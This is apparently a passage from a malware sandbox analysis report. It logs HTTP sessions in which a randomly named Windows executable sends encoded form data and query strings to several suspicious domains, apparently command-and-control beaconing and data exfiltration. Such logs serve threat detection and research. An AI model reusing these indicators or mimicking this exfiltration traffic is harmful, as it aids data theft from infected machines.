                                                                                                                    Nov 2, 2024 20:00:31.579747915 CET918INHTTP/1.1 404 Not Found
                                                                                                                    Date: Sat, 02 Nov 2024 19:00:31 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 774
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    24192.168.2.450026199.192.21.169803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:00:33.426513910 CET532OUTGET /ghvt/?InQ=LTjEQRzJtYpWLPC0PWhno4Odjb6ancq35gdjmmThy52R4q9H0AiUwAwLJzzKst3lsJoWNw2bCWGayp08MXQ4ns4hEFcPU5cg3ajV68ZqrtcUBFUChNwT6XQ=&4b0dM=fDYPF HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.technectar.top
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Nov 2, 2024 20:00:34.140044928 CET933INHTTP/1.1 404 Not Found
                                                                                                                    Date: Sat, 02 Nov 2024 19:00:34 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 774
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    25192.168.2.45002715.197.225.128803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:00:39.228179932 CET801OUTPOST /l8vr/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.linkwave.cloud
                                                                                                                    Origin: http://www.linkwave.cloud
                                                                                                                    Referer: http://www.linkwave.cloud/l8vr/
                                                                                                                    Content-Length: 200
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 4c 57 59 36 35 43 63 76 59 30 37 46 57 49 56 52 54 38 54 47 4a 46 42 75 71 72 34 45 4a 38 78 2f 35 42 4b 4f 61 59 39 43 70 6f 62 53 77 39 46 6b 50 44 66 42 4e 4b 73 5a 42 6d 30 48 7a 46 74 4e 75 58 66 36 4d 46 46 44 75 4b 41 4b 41 6f 73 4c 45 4b 57 4d 58 73 43 54 47 51 30 39 69 4d 48 50 4e 53 37 59 2b 68 6b 66 70 42 50 75 74 53 47 76 69 47 77 4f 53 56 32 69 46 51 79 61 66 6b 72 30 37 77 71 65 71 42 6d 47 63 44 62 68 55 59 65 4c 70 75 74 33 31 73 74 53 72 34 79 6e 61 64 37 6a 63 59 6c 68 47 6e 46 65 53 4c 6d 71 30 67 61 73 49 33 30 48 39 6d 51 2f 71 34 66 2f 31 35 73 6d 62 67 3d 3d
                                                                                                                    Data Ascii: InQ=LWY65CcvY07FWIVRT8TGJFBuqr4EJ8x/5BKOaY9CpobSw9FkPDfBNKsZBm0HzFtNuXf6MFFDuKAKAosLEKWMXsCTGQ09iMHPNS7Y+hkfpBPutSGviGwOSV2iFQyafkr07wqeqBmGcDbhUYeLput31stSr4ynad7jcYlhGnFeSLmq0gasI30H9mQ/q4f/15smbg==
                                                                                                                    Nov 2, 2024 20:00:40.094036102 CET135INHTTP/1.1 405 Not Allowed
                                                                                                                    Server: awselb/2.0
                                                                                                                    Date: Sat, 02 Nov 2024 19:00:39 GMT
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    WAFRule: 0
                                                                                                                    Nov 2, 2024 20:00:40.094319105 CET135INHTTP/1.1 405 Not Allowed
                                                                                                                    Server: awselb/2.0
                                                                                                                    Date: Sat, 02 Nov 2024 19:00:39 GMT
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    WAFRule: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    26192.168.2.45002815.197.225.128803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:00:41.771465063 CET821OUTPOST /l8vr/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.linkwave.cloud
                                                                                                                    Origin: http://www.linkwave.cloud
                                                                                                                    Referer: http://www.linkwave.cloud/l8vr/
                                                                                                                    Content-Length: 220
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 4c 57 59 36 35 43 63 76 59 30 37 46 57 6f 6c 52 66 2f 4c 47 42 46 42 70 32 37 34 45 47 63 78 37 35 42 47 4f 61 5a 34 50 70 65 4c 53 31 6f 35 6b 64 79 66 42 4d 4b 73 5a 4a 47 30 43 33 46 74 38 75 58 62 79 4d 48 52 44 75 4f 67 4b 41 71 30 4c 45 39 4b 4e 57 38 43 52 66 41 30 2f 2f 63 48 50 4e 53 37 59 2b 68 78 43 70 46 72 75 74 47 43 76 67 6a 51 52 62 31 32 68 45 51 79 61 62 6b 72 6f 37 77 71 38 71 44 53 6f 63 41 6a 68 55 64 69 4c 70 2f 74 6f 37 73 74 55 31 34 7a 77 53 66 57 71 61 74 45 69 44 58 64 4d 58 59 6d 77 78 6d 4c 32 5a 47 56 51 76 6d 30 4d 33 2f 57 4c 34 36 52 76 41 68 61 72 50 31 6b 6b 41 74 65 64 6a 62 78 79 63 53 54 51 32 51 67 3d
                                                                                                                    Data Ascii: InQ=LWY65CcvY07FWolRf/LGBFBp274EGcx75BGOaZ4PpeLS1o5kdyfBMKsZJG0C3Ft8uXbyMHRDuOgKAq0LE9KNW8CRfA0//cHPNS7Y+hxCpFrutGCvgjQRb12hEQyabkro7wq8qDSocAjhUdiLp/to7stU14zwSfWqatEiDXdMXYmwxmL2ZGVQvm0M3/WL46RvAharP1kkAtedjbxycSTQ2Qg=
                                                                                                                    Nov 2, 2024 20:00:42.393237114 CET135INHTTP/1.1 405 Not Allowed
                                                                                                                    Server: awselb/2.0
                                                                                                                    Date: Sat, 02 Nov 2024 19:00:42 GMT
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    WAFRule: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    27192.168.2.45002915.197.225.128803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:00:44.351795912 CET10903OUTPOST /l8vr/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.linkwave.cloud
                                                                                                                    Origin: http://www.linkwave.cloud
                                                                                                                    Referer: http://www.linkwave.cloud/l8vr/
                                                                                                                    Content-Length: 10300
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 4c 57 59 36 35 43 63 76 59 30 37 46 57 6f 6c 52 66 2f 4c 47 42 46 42 70 32 37 34 45 47 63 78 37 35 42 47 4f 61 5a 34 50 70 65 44 53 70 4b 68 6b 50 68 48 42 50 4b 73 5a 56 57 30 44 33 46 74 62 75 57 2f 2b 4d 48 63 34 75 49 73 4b 47 2f 67 4c 4e 6f 2b 4e 63 38 43 52 51 67 30 2b 69 4d 47 46 4e 53 72 63 2b 68 68 43 70 46 72 75 74 41 75 76 70 57 77 52 64 31 32 69 46 51 79 73 66 6b 72 4d 37 77 79 47 71 44 57 57 64 78 44 68 56 35 2b 4c 76 4e 46 6f 6b 38 74 57 68 59 7a 34 53 66 61 70 61 70 73 49 44 55 42 69 58 66 57 77 78 6a 36 51 4d 46 56 6d 36 46 55 77 6a 50 36 61 32 34 41 73 46 6d 71 51 4a 67 30 41 63 75 4f 6f 6e 35 35 69 4c 54 58 74 30 48 6c 64 75 62 33 52 69 4d 6d 33 75 4d 4d 63 6f 4c 54 63 31 41 4c 68 4a 78 71 32 61 42 2b 64 4f 34 76 62 31 79 68 79 71 49 6a 6c 43 61 7a 72 75 78 58 67 4f 66 35 64 70 68 70 4d 62 65 42 59 70 67 6f 34 4a 78 6b 6c 4a 6e 75 6f 69 48 58 74 47 2b 4b 6e 4b 77 30 49 47 33 56 78 57 65 79 64 4f 52 63 76 36 7a 73 6a 2b 75 73 4a 33 31 64 37 54 38 38 44 6b 65 47 4a 52 71 [TRUNCATED]
                                                                                                                    Data Ascii: InQ=LWY65CcvY07FWolRf/LGBFBp274EGcx75BGOaZ4PpeDSpKhkPhHBPKsZVW0D3FtbuW/+MHc4uIsKG/gLNo+Nc8CRQg0+iMGFNSrc+hhCpFrutAuvpWwRd12iFQysfkrM7wyGqDWWdxDhV5+LvNFok8tWhYz4SfapapsIDUBiXfWwxj6QMFVm6FUwjP6a24AsFmqQJg0AcuOon55iLTXt0Hldub3RiMm3uMMcoLTc1ALhJxq2aB+dO4vb1yhyqIjlCazruxXgOf5dphpMbeBYpgo4JxklJnuoiHXtG+KnKw0IG3VxWeydORcv6zsj+usJ31d7T88DkeGJRqkB0i9helxr8Lk4+kR/rt4hLkCY/ZbDNJeFUD35q5sbTpro4sBPoVL7ODH9kai6kWX84M5dY23MYmunIbno87QXBi+APTpal3ol0+lmZh/uSKFODKuI9wk2SCRen9Uv5uRmCJq6x1z3h9sbAzZJrwpGVgGs/liS7beTnhJQglebwAvYsFTcYqdqcffgVxxcyRj1ejoOiKQYojanYqx0AUK56jtcROd3w/MSg4yqh0Eqp9/8zSBOHCwtxvVEaGzKZR3eyu/sXNhEzJPSymXAbdSzNLj6M5KBkRo0Yosf5vZg24Hsy43ohlk5kvRyTQW7o+Qn8+QPsNP3VGvx7GmzUSE45SQrfW5iD8huCrsk+yLrt0+05hLN5YYsSbseHXPVCkH1JXlHXnyepkFvrsokKdmRKcFeyKhL8RJLa/GwTZl5tnz7n0emalp0uN2B6K85h/bcxnGBQoMFNawr995hobUADvkEJu9ay1JpXdXNhGahDnfrbCb6SGbTpd2JeVMKTd0QparA7hSFm1x6vHgxAQXTPC3xcZNwG1xbyhOh+ZQa0VwjebwDzARHYdrXzsoPwHMrezqr4oREcD/B6XYK8ItogOzTiA8RXauI45DVjDKKOD/NwVZTj60g9tMh1E69vErLrrQJQsZ9woLCxPvY1eLCBmSZxFPUmIpf [TRUNCATED]
                                                                                                                    Nov 2, 2024 20:00:44.958729982 CET668INHTTP/1.1 403 Forbidden
                                                                                                                    Server: awselb/2.0
                                                                                                                    Date: Sat, 02 Nov 2024 19:00:44 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 520
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    28192.168.2.45003015.197.225.128803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:00:46.975892067 CET532OUTGET /l8vr/?4b0dM=fDYPF&InQ=GUwa608LSzm8fYtTR+SEUVhxn7QWXd8p00umbYRCm/TJjJxpSTDMONkqNmsHjnZjkXKqFncjqJIueqMvFavlRP3KaSMB9eKJFRSf7ydL9xHq5BCglnMKa3Y= HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.linkwave.cloud
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Nov 2, 2024 20:00:47.554290056 CET133INHTTP/1.1 404 Not Found
                                                                                                                    Server: awselb/2.0
                                                                                                                    Date: Sat, 02 Nov 2024 19:00:47 GMT
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    WAFRule: 5


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    29192.168.2.450031188.114.97.3803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:00:52.680602074 CET813OUTPOST /5hcm/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.bayarcepat19.click
                                                                                                                    Origin: http://www.bayarcepat19.click
                                                                                                                    Referer: http://www.bayarcepat19.click/5hcm/
                                                                                                                    Content-Length: 200
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 67 4e 66 45 44 55 76 67 50 72 79 7a 56 55 4b 4d 66 43 46 51 43 71 4c 4d 55 4d 74 4a 6c 58 6e 48 46 33 65 30 4d 6d 70 64 75 2f 6e 72 4a 79 5a 57 46 52 6a 43 36 4a 71 6e 57 44 46 59 49 6d 69 41 52 48 41 4f 51 43 58 33 5a 59 5a 58 58 4a 67 44 67 63 78 41 6b 45 4e 6d 6f 70 36 69 53 69 65 4d 59 75 65 41 31 68 47 39 30 38 30 73 69 4e 76 58 54 31 51 7a 41 72 35 46 64 2b 73 77 2f 2b 4d 70 67 46 30 42 75 49 71 6c 53 43 49 4f 73 41 6e 61 51 50 61 43 70 2b 65 76 47 65 63 65 48 32 4c 64 59 51 79 4a 68 39 6a 39 62 49 39 64 52 32 6d 6d 52 73 62 67 75 4b 59 6d 69 77 6e 4c 57 30 32 4e 54 51 3d 3d
                                                                                                                    Data Ascii: InQ=gNfEDUvgPryzVUKMfCFQCqLMUMtJlXnHF3e0Mmpdu/nrJyZWFRjC6JqnWDFYImiARHAOQCX3ZYZXXJgDgcxAkENmop6iSieMYueA1hG9080siNvXT1QzAr5Fd+sw/+MpgF0BuIqlSCIOsAnaQPaCp+evGeceH2LdYQyJh9j9bI9dR2mmRsbguKYmiwnLW02NTQ==
                                                                                                                    Nov 2, 2024 20:00:53.314119101 CET1031INHTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Sat, 02 Nov 2024 19:00:53 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 167
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=3600
                                                                                                                    Expires: Sat, 02 Nov 2024 20:00:53 GMT
                                                                                                                    Location: https://www.bayarcepat19.click/5hcm/
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xSdQgP%2Fvaensej3%2Bn0zKyne%2BpZCqkGorI8ZRkpyiMC7lS2Az5dxfHhBxu0PgCIjmBbfeTegS22TeNYsPdEbXUK7fA4Id18guSyK4Wqoxvh7QBeBUI1nlVNhI7bi9RaOTmDLlvQjLwG0r"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8dc65eb89ebce552-DFW
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1277&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=813&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    30192.168.2.450032188.114.97.3803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:00:55.226794004 CET833OUTPOST /5hcm/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.bayarcepat19.click
                                                                                                                    Origin: http://www.bayarcepat19.click
                                                                                                                    Referer: http://www.bayarcepat19.click/5hcm/
                                                                                                                    Content-Length: 220
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 67 4e 66 45 44 55 76 67 50 72 79 7a 56 30 61 4d 65 6c 78 51 45 4b 4c 50 52 4d 74 4a 76 33 6e 44 46 33 61 30 4d 6e 73 59 76 4e 44 72 4b 57 56 57 45 51 6a 43 32 70 71 6e 4f 7a 46 42 46 47 6a 43 52 48 45 77 51 44 72 33 5a 59 64 58 58 4c 34 44 68 72 74 42 6b 55 4e 6b 75 70 36 67 64 43 65 4d 59 75 65 41 31 68 53 44 30 38 63 73 69 35 72 58 54 57 49 79 4f 4c 35 45 61 2b 73 77 75 4f 4d 74 67 46 30 2f 75 4a 33 49 53 41 77 4f 73 41 58 61 51 2b 61 42 79 75 65 74 49 2b 64 75 48 56 36 56 5a 46 48 49 2b 63 61 65 62 37 5a 69 5a 51 33 38 41 64 36 33 38 4b 38 56 2f 33 75 2f 62 33 4c 45 49 62 59 36 67 31 6e 73 42 68 43 6e 30 7a 37 31 35 7a 6c 39 5a 35 30 3d
                                                                                                                    Data Ascii: InQ=gNfEDUvgPryzV0aMelxQEKLPRMtJv3nDF3a0MnsYvNDrKWVWEQjC2pqnOzFBFGjCRHEwQDr3ZYdXXL4DhrtBkUNkup6gdCeMYueA1hSD08csi5rXTWIyOL5Ea+swuOMtgF0/uJ3ISAwOsAXaQ+aByuetI+duHV6VZFHI+caeb7ZiZQ38Ad638K8V/3u/b3LEIbY6g1nsBhCn0z715zl9Z50=
                                                                                                                    Nov 2, 2024 20:00:55.849051952 CET1033INHTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Sat, 02 Nov 2024 19:00:55 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 167
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=3600
                                                                                                                    Expires: Sat, 02 Nov 2024 20:00:55 GMT
                                                                                                                    Location: https://www.bayarcepat19.click/5hcm/
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xTPKNH8h6z%2BuIfEF%2FwzT%2Bah1RFbWNIQepOVBgsli5RcBzIDbGUnD9IxfxWki5PCTnaEbxa7uhPKfpuF1wHXMItDoD2L34x8%2BGUU3SwSkX47P7hJTx48ydjuNgA2mDHgTgN2joemdAXgk"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8dc65ec89d750bb8-DFW
